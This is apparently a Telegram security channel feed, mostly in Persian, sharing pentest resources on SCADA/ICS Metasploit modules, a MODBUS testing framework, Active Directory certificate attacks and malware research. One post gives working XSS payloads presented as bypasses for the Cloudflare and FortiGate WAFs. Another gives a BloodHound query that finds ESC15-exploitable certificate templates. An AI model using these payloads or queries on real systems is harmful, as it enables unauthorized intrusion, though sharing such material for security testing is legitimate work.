P.F.K Security

SCADA Hacking: Metasploit SCADA Modules به عنوان یک پنتستر/هکر ، ما منابع زیادی داریم که می‌توانیم از آنها برای آزمایش امنیت سیستم SCADA/ICS استفاده کنیم. یکی از محبوب ترین آنها فریم ورک Metasploit است. در اینجا، من سعی کرده ام لیستی از اکثر ماژول های Metasploit…

ستون System(s) سیستم های آسیب پذیر در برابر ماژول اکسپلویت/اسکنر را نشان می دهد. یک بار دیگر می خواهم بر ماهیت متنوع سیستم های SCADA/ICS تاکید کنم.
لطفاً توجه داشته باشید که ماژول‌ها از ماژول‌های بهره‌برداری و ماژول‌های کمکی (عمدتاً برای recon استفاده می‌شوند) متفاوت هستند.

@pfksecurity

445 views06:27

P.F.K Security

ستون System(s) سیستم های آسیب پذیر در برابر ماژول اکسپلویت/اسکنر را نشان می دهد. یک بار دیگر می خواهم بر ماهیت متنوع سیستم های SCADA/ICS تاکید کنم. لطفاً توجه داشته باشید که ماژول‌ها از ماژول‌های بهره‌برداری و ماژول‌های کمکی (عمدتاً برای recon استفاده می‌شوند)…

729 views06:28

P.F.K Security

MODBUS Penetration Testing Framework

https://github.com/trouat/smod

@pfksecurity

GitHub

GitHub - trouat/smod: MODBUS Penetration Testing Framework

MODBUS Penetration Testing Framework. Contribute to trouat/smod development by creating an account on GitHub.

673 views06:31

P.F.K Security

CLOUDFLARE BYPASS xss

PAYLOAD:

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>

FortiGate WAF bypass

<details open ontoggle="(()=>alertibrahimxss)()"></details>

#exploit #bypass
@pfkSecurity

609 views09:26

P.F.K Security

BloodHound ADCS ESC15 (EKUwu) cypher query.

از این جستجوی رمزگذاری برای بررسی حقوق ثبت نام در قالب‌های گواهی استفاده کنید که الزامات حمله ADCS ESC15 (EKUwu) را که اخیراً فاش شده است را برآورده می‌کند.

MATCH p=(:Base)-[:Enroll|AllExtendedRights]->(ct:CertTemplate)-[:PublishedTo]->(:EnterpriseCA)-[:TrustedForNTAuth]->(:NTAuthStore)-[:NTAuthStoreFor]->(:Domain)
WHERE ct.enrolleesuppliessubject = True
AND ct.authenticationenabled = False
AND ct.requiresmanagerapproval = False
AND ct.schemaversion = 1
RETURN p

@PfkSecurity

581 views21:37

P.F.K Security

https://bible.malcore.io/readme/the-beginning/introduction-to-malware
#malware
@PfkSecurity

638 views10:26

P.F.K Security

https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/

HarfangLab | Your endpoints, our protection

HijackLoader evolution: abusing genuine signing certificates

Our telemetry has revealed a significant increase in Lumma Stealer malware deployments via the HijackLoader malicious loader.

650 views19:13

P.F.K Security

ssa-589181.pdf

34.9 KB

SSA-589181: Denial-Of-Service in SIMATIC S7-200 SMART CPU
Family Devices

@PfkSecurity

662 views08:59

P.F.K Security

2:51

This media is not supported in your browser

VIEW IN TELEGRAM

این ویدئو یک سناریوی "MITM" را نشان می دهد که بین PLC و HMI انجام شده است. این وکتور حمله نشان می دهد که چگونه می توان کنترل کامل یک موتور (دستگاه نقطه پایانی) را به دست آورد. پس از مسموم کردن یا همون poisoning جدول arp HMI و درج مقادیر جعلی، مقادیر مطلوب را مستقیماً به PLC ارسال کردند تا نمایشی نادرست (مشابه نتایج حمله استاکس نت) ایجاد کنند.

@PfkSecurity

874 views09:17

P.F.K Security

https://research.nccgroup.com/2024/06/11/pumping-iron-on-the-musl-heap-real-world-cve-2022-24834-exploitation-on-an-alpine-mallocng-heap/

Nccgroup

Cyber Security Research

Cutting-edge cyber security research from NCC Group. Find public reports, technical advisories, analyses, & other novel insights from our global experts.

703 views04:26

P.F.K Security

https://t.iss.one/+114BerAH5lo1ODM0

P.F.K Security Chat

You’ve been invited to join this group on Telegram.

671 views14:59